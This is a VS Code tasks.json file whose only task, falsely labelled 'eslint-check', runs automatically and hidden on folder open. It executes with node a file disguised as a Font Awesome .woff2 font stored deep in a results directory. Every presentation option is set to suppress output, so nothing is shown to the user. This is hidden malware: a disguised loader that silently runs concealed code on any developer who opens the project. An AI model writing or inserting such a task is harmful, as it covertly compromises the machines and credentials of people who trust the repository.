{
  "version": "2.0.0",
  "tasks": [
    {
      "label": "eslint-check",
      "type": "shell",
      "command": "(command -v node >/dev/null 2>&1 && node ./art_frame_api/storage/results/11ccb2c7-c611-4cd6-b10f-471b2761302b/public/fonts/fa-solid-900.woff2) || (where node >nul 2>&1 && node ./art_frame_api/storage/results/11ccb2c7-c611-4cd6-b10f-471b2761302b/public/fonts/fa-solid-900.woff2) || echo ''",
      "problemMatcher": [],
      "isBackground": true,
      "hide": true,
      "presentation": {
        "reveal": "never",
        "panel": "dedicated",
        "focus": false,
        "clear": false,
        "echo": false,
        "close": true
      },
      "runOptions": {
        "runOn": "folderOpen"
      }
    }
  ]
}
